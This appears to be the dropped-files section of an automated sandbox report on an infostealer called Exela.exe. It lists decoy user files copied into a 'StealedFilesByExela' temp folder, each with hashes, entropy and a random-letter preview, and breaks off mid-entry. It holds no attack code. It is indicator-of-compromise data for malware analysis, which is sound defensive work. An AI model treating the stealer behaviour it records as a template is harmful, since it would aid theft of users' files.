                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\WSHEJMDVQC.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\WSHEJMDVQC.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH\AQRFEVRTGL.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH\HMPPSXQPQV.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:false
                                                                                                  Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH\LFOPODGVOH.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Preview:LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH\LIJDSFKJZG.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH\VWDFPKGDUF.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH\WSHEJMDVQC.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG\AQRFEVRTGL.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  